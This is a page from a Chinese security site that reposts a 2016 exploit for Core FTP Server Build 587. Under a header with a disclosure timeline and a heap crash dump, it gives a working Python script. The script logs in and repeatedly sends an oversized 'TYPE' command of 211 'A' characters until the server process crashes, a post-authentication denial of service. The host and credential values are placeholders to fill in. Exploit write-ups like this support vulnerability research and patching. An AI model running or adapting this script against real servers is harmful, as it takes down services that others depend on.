首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Core FTP Server 32-bit Build 587 - Heap Overflow
来源:ptpxploit at gmail 作者:Purcell 发布时间:2016-05-11  
# -*- coding: cp1252 -*-
# Exploit Title: Core FTP Server 32-bit - Build 587 Heap Overflow
# Date: 05/10/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.coreftp.com/
# Vulnerable Version Download:  http://coreftp.com/server/download/archive/CoreFTPServer587.exe
# Version: Core FTP Server 32-bit - Build 587 32-bit
# Tested on: Windows XP SP3 x32 English, Windows 7 Pro x64 SP1 English, Windows 10 Pro x64 English
# Category: Remote Heap Overflow PoC
#
# Timeline: 03/03/16 Bug found
#           03/04/16 Vender notified
#           03/06/16 Vender replied acknowledging the issue
#           04/07/16 Vender releases Build 588 which fixes the issue.
#           05/10/16 Exploit Released
#
# Summary:  This exploit allows for a post authentication DOS.  The server does not do proper bounds checking on
#           server responses.  In this case, the long 'MODE set to ...' reply invoked by a long TYPE command
#           causes a heap overflow and crashes the server process.
#
#           Crash info:
#
#           0133FA2C  32 30 30 20 4D 4F 44 45  200 MODE
#           0133FA34  20 73 65 74 20 74 6F 20   set to
#           0133FA3C  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA44  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA4C  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA54  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA5C  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA64  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA6C  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA74  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA7C  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA84  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA8C  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA94  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FA9C  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAA4  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAAC  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAB4  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FABC  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAC4  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FACC  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAD4  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FADC  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAE4  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAEC  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAF4  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FAFC  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FB04  41 41 41 41 41 41 41 41  AAAAAAAA
#           0133FB0C  58 02 00 00 8E EB 31 57  X..Žë1W
#
#           00439827   . 8B86 3C040000  MOV EAX,DWORD PTR DS:[ESI+43C]           ;  ESI invalid address: DS:[4141457D]=???
#           0043982D   . 85C0           TEST EAX,EAX
#
#           DS:[4141457D]=???
#           EAX=00000000
#
#           EAX 00000000
#           ECX 00000000
#           EDX 00000001
#           EBX 01141B90
#           ESP 0142C06C
#           EBP 0143FB3C
#           ESI 41414141
#           EDI 00000000
#           EIP 00439827 coresrvr.00439827
#           C 1  ES 0023 32bit 0(FFFFFFFF)
#           P 1  CS 001B 32bit 0(FFFFFFFF)
#           A 1  SS 0023 32bit 0(FFFFFFFF)
#           Z 0  DS 0023 32bit 0(FFFFFFFF)
#           S 1  FS 003B 32bit 7FFD8000(FFF)
#           T 1  GS 0000 NULL
#           D 0
#           O 0  LastErr ERROR_SUCCESS (00000000)
#           EFL 00000397 (NO,B,NE,BE,S,PE,L,LE)
#           ST0 empty
#           ST1 empty
#           ST2 empty
#           ST3 empty
#           ST4 empty
#           ST5 empty
#           ST6 empty
#           ST7 empty
#                          3 2 1 0      E S P U O Z D I
#           FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#           FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
 
import time
import socket
from ftplib import FTP
 
host='yourhost'             #host or IP
port=21                     #port
u="youruser"                #username
p="yourpass"                #password
pause=3                     #pause between login & command attempts, normally 3 seconds is plenty of time.
command="TYPE "
evil="A"*211                #Any more, and the program warns of buffer overflow attempt and ignores the command
evilTYPE=(command+evil)     #Evil type command
 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
open = sock.connect_ex((host,port))
sock.close()
 
if (open == 0):
    print "FTP is up, lets fix that..."
    while (open != 10061):
        print "Connecting to send evil TYPE command..."
        ftp = FTP()
        ftp.connect(host,port)
        ftp.login(u,p)
        ftp.sendcmd(evilTYPE)
        ftp.close()
        time.sleep(pause)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        open = sock.connect_ex((host,port))
        sock.close()
    print "No more files for you!"
else:
    print "Port "+str(port)+" does not seem to be open on "+host
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ipswitch WS_FTP LE 12.3 - Sear
·Linux Kernel bpf related UAF V
·MediaInfo 0.7.61 - Crash PoC
·FTP JCL Execution
·PHP 5.2.x Safe Mode Windows By
·Microsoft Excel 2010 - Crash P
·Ruby on Rails Development Web
·Android Broadcom Wi-Fi Driver
·ImageMagick Delegate Arbitrary
·runAV mod_security - Arbitrary
·RPCScan 2.03 - Hostname/IP Fie
·NRSS Reader 0.3.9 - Local Stac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved